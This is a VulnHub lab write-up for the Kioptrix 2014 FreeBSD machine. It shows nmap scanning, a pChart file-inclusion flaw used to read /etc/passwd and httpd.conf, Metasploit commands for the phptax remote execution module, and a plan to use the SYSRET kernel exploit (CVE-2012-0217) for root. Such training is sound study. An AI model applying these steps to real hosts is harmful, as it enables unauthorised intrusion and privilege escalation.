Vulnhub Write-up Kioptrix 2014 (#5)
This is the write-up of the Machine KIOPTRIX from VulnHub.
DIGEST
Kioptrix the based on the FreeBSD 9.0, with the help of phptax vulnerability we got the initial shell and SYSRET kernel exploit helps us to get the root.
Machine Author: Kioptrix
Machine Type: FreeBSD 9.0
Know-How
- Nmap
- Searchsploit
- Metasploit
Absorb Skills
- pChart 2.1.3 exploit
- phptax exploit
- SYSRET kernel exploit(CVE: 2012–0217)
Scanning the Network
$nmap -sC -sV 192.168.0.130
There are two ports open, 80 && 8080. Port 8080 give us Forbidden and Port 80 display “It works” msg.
Page source of page 80 gives us a hint to a URL.
Exploiting the Server
There is a pChart application, on doing a searchsploit with version, found multiple Vulnerabilities.
$searchsploit pchart 2.1.3
$searchsploit -m exploits/php/webapps/31173.txt
$cat 31173.txtCopy the exploit into the current working directory.
$cat 31173.txt
LFI is working, let's try to grab the, etc/passwd file.
Note down the OS version maybe it will help in the privilege escalation.
Let's grab the httpd.conf file which is used to store the configuration.
During the initial recon port, 8080 is not assessable, let's try to find out in the httpd.conf file.
To access the port 8080 user agent must be Mozilla/4.0 Mozilla4_browser.
Port 8080 has a phptax application running, let's try to find out any vulnerability present in the application using searchsploit.
$searchsploit phptax
OWN WWW
$msfconsole
msf5 > search phptax
msf5 > use exploit/multi/http/phptax_exec
msf5 exploit(multi/http/phptax_exec) > set RHOSTS 192.168.0.130
msf5 exploit(multi/http/phptax_exec) > set RPORT 8080
msf5 exploit(multi/http/phptax_exec) > exploit
OWN ROOT
During the initial recon, we find out the FreeBSD version is 9, let's try to find out if there is any kernel-level exploit which will help to gain the root.
$searchsploit FreeBSD 9.0
Let's try to move the exploit to the machine, wget and curl are not installed into the machine so I am using Netcat to upload.
Thanks for reading! If you enjoyed this story, please click the 👏 button and share it to help others! Feel free to leave a comment 💬 below. Have feedback? Let’s connect on Twitter.
